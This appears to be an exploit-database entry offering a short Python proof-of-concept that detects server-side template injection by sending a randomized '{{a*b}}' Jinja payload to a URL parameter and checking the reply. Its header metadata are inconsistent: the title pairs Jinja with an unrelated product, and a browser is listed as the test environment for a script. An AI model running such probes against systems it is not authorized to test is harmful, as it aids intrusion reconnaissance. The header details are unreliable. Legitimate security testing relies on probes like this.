Share
## https://sploitus.com/exploit?id=PACKETSTORM:216767
=============================================================================================================================================
    | # Title     : Jinja 2 1.4.0 Tactical RMM SSTI Detection                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://pypi.org/project/Jinja2/                                                                                            |
    =============================================================================================================================================
    
    [+] Summary    : This proof-of-concept script detects potential Server-Side Template Injection (SSTI) vulnerabilities in web applications using template engines such as Jinja.
                     The script sends a dynamically generated mathematical expression within a template payload to a target URL parameter. 
    				 If the server evaluates the expression and returns the calculated result, this indicates that user-controlled input is being processed by the template engine without proper sanitization or sandboxing.
                     Such behavior confirms the presence of an SSTI vulnerability, which may allow attackers to access internal application objects and potentially escalate the issue to more severe impacts if additional weaknesses exist.
                     The script improves detection reliability by generating randomized arithmetic expressions, reducing the likelihood of false positives during testing.
    			  
    [+] POC   :  
    
    import requests
    import random
    import sys
    
    def detect_ssti(url, param="tpl"):
        a = random.randint(10, 99)
        b = random.randint(10, 99)
        expected = str(a * b)
    
        payload = "{{%d*%d}}" % (a, b)
    
        try:
            r = requests.get(url, params={param: payload}, timeout=10)
    
            if expected in r.text:
                print("[+] SSTI detected!")
                print("[+] Payload:", payload)
                print("[+] Expected:", expected)
                return True
            else:
                print("[-] No SSTI detected")
    
        except Exception as e:
            print("[-] Error:", e)
    
        return False
    
    
    if __name__ == "__main__":
    
        if len(sys.argv) != 2:
            print("Usage: python ssti_poc.py http://target/?tpl=")
            sys.exit(1)
    
        target = sys.argv[1]
        detect_ssti(target)
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================